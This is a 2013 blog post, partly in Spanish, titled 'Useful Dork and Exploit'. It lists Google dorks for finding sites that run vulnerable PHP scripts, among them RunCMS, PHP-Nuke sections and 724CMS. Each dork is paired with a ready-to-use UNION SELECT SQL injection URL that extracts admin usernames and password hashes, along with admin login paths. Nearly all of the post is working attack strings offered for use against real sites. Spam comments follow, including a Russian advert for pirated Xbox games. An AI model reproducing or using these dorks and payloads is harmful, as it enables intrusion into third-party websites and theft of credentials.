Tuesday, 22 January 2013

Useful Dork and Exploit


SQL Inyection

Hola,
SQL Injection

--------------------------------------------------------------------

DORK 1 : allinurl: "index.php?go=subcat"

DORK 2 : powered by SSWD


EXPLOiT :

index.php?go=subcat&id=-999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6/**/from/**/admin/*


admin login=admin/login.php (For Login)

****************************************************

DORK 1 : powered by Site Sift

DORK 2 : allinurl: "index php go addpage"

DORK 2 : allinurl: "index.php?go=detail id="


EXPLOiT 1:

index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16/**/from/**/admin/*

EXPLOIT 2:

index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2​0/**/from/**/admin/*


ADMiN LOGiN::admin/login.php


SALUDOS A TODOS......EVA


724CMS + "Version 4.01"



index.php?ID=null+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x202d20,ID,Use​r_Login,User_Password),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+FROM+User​s--

-----------------------------------------------------------------------------------------------------------


allinurl: "index.php?p=gallerypic img_id"
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi4_user

EXPLOiT 2:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6,7,8+from+koobi_user

-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: "index.php?mod=archives"


EXPLOiT 1:

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10,11,12,13/**/from/**/users/*

EXPLOiT 2:

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10/**/from/**/users/*

EXPLOiT 3:

index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0x3a,pass),7,8,9,10,11,12,13,14​/**/from/**/users/*

-----------------------------------------------------------------------------------------------------------


DORK 1 : "Powered by Smoothflash"

DORK 2 : allinurl: "admin_view_image.php"


EXPLOiT :

admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users



DORK 1 : allinurl: \"sections.php?op=listarticles\"secid

DORK 2 ; allinurl: \"sections php op\"


EXPLOiT :

sections.php?op=listarticles&secid=-9999999/**/union/**/select/**/concat(aid,0x3a,pwd)/**/from/**/authors/*


sections.php?op=listarticles&secid=-9999999/**/union/**/select/**/concat(aid,0x3a,pwd),1,2,concat(aid,0x3a,pwd)/**/from/**/authors/*



sections.php?op=listarticles&secid=-9999999/**/union/**/select/**/0,concat(aid,0x3a,pwd),2/**/from/**/authors/*



sections.php?op=printpage&artid=-9999999/**/union/**/select/**/0,concat(aid,0x3a,pwd)/**/from/**/authors/*
-----------------------------------------------------------------------------------------------------------
DORK 1 : \"Powered by Esy\"


EXPLOiT 1 :

sections.php?op=viewarticle&artid=-9999999/**/union/**/select/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*

EXPLOiT 2 :

sections.php?op=printpage&artid=-9999999/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/*
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: \"fundlinkllc.com\"

DORK 2 : \"Fundlink LLC\"


EXPLOiT :

showcategory.php?id=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/users
-------------------------------------------------------------

DORK 1 : allinurl: \"index.php?go=detail\"

DORK 2 : allinurl: \"Powered by Com Endeavors\"

DORK 3 : \"Emlak NET Kiralik ve Satilik Emlak Sitesi\"

*****DORKS******

allinurl: \"index php go buy\"
allinurl: \"index.php?go=sell\"
allinurl: \"index php go linkdir\"
allinurl: \"index.php?go=resource_center\"
allinurl: \"resource_center.html\"
allinurl: \"index.php?go=properties\"
allinurl: \"index.php?go=register\"


EXPLOIT :

index.php?go=detail&id=-99999/**/union/**/select/**/0,0,0,0,0,0,0,0,0,0,0x7c,email,0x3a,concat(username,0x3a,password),1,1,1,1,1,1,2​,2,2,2,2/**/from/**/admin/*where,limit,2--

admin panel login:

admin/login.php hay muchas
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: \"index.php?pgid\"cat_id


EXPLOIT :

index.php?pgid=4&cat_id=-99999/**/union/**/select/**/1,1,1,concat(email,0x7c,username,0x7c,password),0x3a,1,1,1,1,1/**/from/**/users/*where%20admin1,1
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: "showCat.php?cat_id"



EXPLOIT :

showCat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*
-----------------------------------------------------------------------------------------------------------
DORK 1 : allinurl: "modules/photo/viewcat.php?id"

DORK 2 : inurl:photo "powered by runcms"


EXPLOIT :

admin

modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*

pass

modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
-----------------------------------------------------------------------------------
DORK 1 : allinurl: "modules MyAnnonces index php pa view"


EXAMPLE
XXXXMyAnnonces/index.php?pa=view&cid=[EXPLOiT>

EXPLOIT :

for admin = -9999999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*

for pass = -9999999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*

-----------------------------------------------------------------------------------

DorKs 1 : "2007 BookmarkX script"

DORKS 2 : Powered by GengoliaWebStudio
DORK 3 : allinurl :"index.php?menu=showtopic"

EXPLOIT :

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6/**/FROM/**/admin/*%20admin=1

o

index.php?menu=showtopic&topicid=-1/**/UNION/**/ALL/**/SELECT/**/1,2,concat(auser,0x3a,apass),4,5,6,7/**/FROM/**/admin/*%20admin=1

-----------------------------------------------------------------------------------

DORKS 2 : allinurl: " list.php?pagenum"

EXPLOIT

list.php?pagenum=0&categoryid=1+union+select+111,222,concat_ws(char(5Cool,login,password),444+f​rom+admin_login/*


-----------------------------------------------------------------------------------

DORK 1 : allinurl: \"recipe.php?recipeid\"

admin login=siteadmin


EXPLOIT :

recipe.php?recipeid=99999/**/union/**/select/**/0,concat(login,0x3a,password)/**/from/**/admin_login/*

-----------------------------------------------------------------------------------
DORK 1 : "powered by niccell"

##admin login=siteadmin


EXPLOIT :

list.php?pagenum=S@BUN&categoryid=9999+union+select+111,222,concat(login,0x3a,password),444+from+ad​min_login/*

----------------------------------------------------------------------------------

DORK 1 : allinurl:\"print.php?recipeid\"

admin login=siteadmin


EXPLOIT :

print.php?recipeid=777%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,concat(login,0x3a,password)/**/from%2F%2A%2A%2Fadmin_login/*where%20admin
-----------------------------------------------------------------------------------------------------------


DORK 1 : allinurl:"list.php?pagenum"catid

admin login=siteadmin


EXPLOIT :

list.php?pagenum=0&catid=99999/**/union/**/select/**/0,concat(login,0x3a,password)/**/from/**/admin_login/*

4 comments:

  1. An interesting discussion is definitely worth comment. I do believe that you ought to publish more
    about this subject matter, it may not be a taboo subject but
    generally folks don't speak about these subjects. To the next! Many thanks!!

    my webpage :: Hollow Ichigo Contacts

    ReplyDelete
  2. Консоли от компании Microsoft не сразу завоевали всемирную известность и доверие игроков. Первая консоль под названием Xbox, вышедшая в далеком 2001 году, значительно уступала PlayStation 2 по количеству проданных приставок. Но все поменялось с выходом Xbox 360 - консоли седьмого поколения, которая стала по-настоящему "народной" для жителей Рф и государств СНГ - http://ru-xbox.ru/load/1/1/1. Портал Ru-Xbox.Ru является популярным ресурсом среди поклонников приставки, поскольку он предлагает игры для Xbox 360, которые поддерживают все существующие версии прошивок - совершенно бесплатно! Для чего играть на оригинальном железе, если имеется эмуляторы? Для Xbox 360 игры выходили долгое время и находятся как посредственными проектами, так и хитами, многие из которых даже сейчас остаются уникальными для это консоли. Некоторые пользователи, желающие сыграть в игры для Xbox 360, смогут задать вопрос: для чего необходимы игры для прошитых Xbox 360 freeboot или разными версиями LT, в случае если есть эмулятор? Рабочий эмулятор Xbox 360 хоть и существует, но он требует производительного ПК, для покупки которого потребуется вложить существенную сумму. К тому же, различные артефакты в виде исчезающих текстур, отсутствия некоторых графических эффектов и освещения - смогут изрядно испортить впечатления об игре и отбить желание для ее предстоящего прохождения. Что предлагает этот интернет-сайт? Наш сайт на сто процентов посвящен играм для приставки Xbox 360. У нас можно совершенно бесплатно и без регистрации скачать игры на Xbox 360 через torrent для следующих версий прошивок консоли: - FreeBoot; - LT 3.0; - LT 2.0; - LT 1.9. Каждая прошивка имеет свои особенности обхода интегрированной защиты. Поэтому, для запуска той либо прочей игры потребуется скачать специальную ее версию, которая полностью адаптирована под одну из 4 перечисленных выше прошивок. На нашем интернет-сайте можно без труда получить желаемый проект под подходящую прошивку, поскольку возле каждой игры находится заглавие версии (FreeBoot, LT 3.0/2.0/1.9), под которую она приспособлена. Геймерам данного ресурса доступна особая категория игр для 360-го, предназначенных для Kinect - специального дополнения, которое считывает все движения 1-го либо нескольких игроков, и позволяет управлять с помощью их компьютерными персонажами. Большой выбор ПО Кроме способности загрузить игры на Xbox 360 Freeboot либо LT разных версий, тут можно подобрать программное обеспечение для консоли от Майкрософт: - разные версии Dashboard, которые позволяют кастомизировать интерфейс консоли под свои нужды, сделав его более комфортным и современным; - браузеры; - просмотрщики файлов; - сохранения для игр; - темы для консоли; - программы, для конвертации образов и записи их на диск. Помимо перечисленного выше игры на Xbox 360 Freeboot можно запускать не с дисковых, а с USB и прочих носителей, используя программу x360key, которую можно достать на нашем интернет-сайте. Гостям доступно огромное количество нужных статей, а помимо этого форум, где вы можете пообщаться с единомышленниками либо попросить совета у более опытнейших хозяев консоли.

    ReplyDelete
  3. Your car might be stolen if you don't keep this in mind!

    Imagine that your car was taken! When you visit the police, they inquire about a specific "VIN decoder"

    Describe a VIN decoder.

    Similar to a passport, the "VIN decoder" allows you to find out the date of the car's birth and the identity of its "parent"( manufacturing plant). You can also figure out:

    1.Type of engine

    2.Model of a vehicle

    3.The limitations of the DMV

    4.The number of drivers in this vehicle

    The location of the car will be visible to you, and keeping in mind the code ensures your safety. The code can be checked in the database online. The VIN is situated on various parts of the car to make it harder for thieves to steal, such as the first person sitting on the floor, the frame (often in trucks and SUVs), the spar, and other areas.

    What if the VIN is intentionally harmed?

    There are numerous circumstances that can result in VIN damage, but failing to have one will have unpleasant repercussions because it is illegal to intentionally harm a VIN in order to avoid going to jail or the police. You could receive a fine of up to 80,000 rubles and spend two years in prison. You might be held up on the road by a teacher.

    Conclusion.

    The VIN decoder may help to save your car from theft. But where can you check the car reality? This is why we exist– VIN decoders!

    ReplyDelete